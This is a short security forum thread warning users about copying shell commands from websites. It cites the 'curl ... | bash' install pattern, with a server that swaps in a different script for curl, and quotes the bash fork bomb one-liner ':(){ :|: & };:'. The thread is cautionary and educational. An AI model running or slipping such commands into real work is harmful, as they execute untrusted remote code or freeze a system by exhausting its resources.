Rocksolid Light

Welcome to Rocksolid Light

register   nodelist   faq  


rocksolid / rocksolid.shared.security / Re: careful with copy/pasting shell commands

SubjectAuthor
* careful with copy/pasting shell commandsanonymous
`* Re: careful with copy/pasting shell commandsAnonUser
 `* Re: careful with copy/pasting shell commandsAnonUser
  `* Re: careful with copy/pasting shell commandsanonymous
   `- Re: careful with copy/pasting shell commandsanonymous

Subject: careful with copy/pasting shell commands
From: anonymous@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Sun, 27 Oct 2019 23:04 UTC
nice poc here:
https://thejh.net/misc/website-terminal-copy-paste
Posted on def2




Subject: Re: careful with copy/pasting shell commands
From: AnonUser@rslight.i2p (AnonUser)
Newsgroups: rocksolid.shared.security
Organization: Rocksolid Light
Date: Mon, 28 Oct 2019 09:28 UTC
anonymous wrote:

nice poc here:
https://thejh.net/misc/website-terminal-copy-paste
Posted on def2

Interesting. I guess most of us have been guilty of doing this!


--
Posted on Rocksolid Light



Subject: Re: careful with copy/pasting shell commands
From: anonuser@retrobbs.rocksolidbbs.com.remove-1ao-this (AnonUser)
Newsgroups: rocksolid.shared.security
Organization: RetroBBS
Date: Mon, 28 Oct 2019 09:47 UTC
  To: AnonUser
There is a similar trick with curl. Many bad projects ask the user to execute a command that looks like:

curl https://example.com/install | bash

You can view the file install.sh inside your browser and it will look like a regular installation file. As soon as you run the above command, the HTTP server is configured in a way that it will detect the curl user-agent and give you a completely different script to execute.
--
Posted on RetroBBS



Subject: Re: careful with copy/pasting shell commands
From: anonymous@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Mon, 28 Oct 2019 20:46 UTC
I guess most of us have been guilty of doing this

I know I have. Same as with the curl command, this is in fact childishly simple, but I never thought about it...
Posted on def2




Subject: Re: careful with copy/pasting shell commands
From: anonymous@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Sat, 2 Nov 2019 20:19 UTC
for a similar subject, i found this here by chance:

https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/

and was impressed by this innocent/weird looking piece of bash code:

:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

    :(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.
Posted on def2




1
rocksolid light 0.6.5e
clearnet i2p tor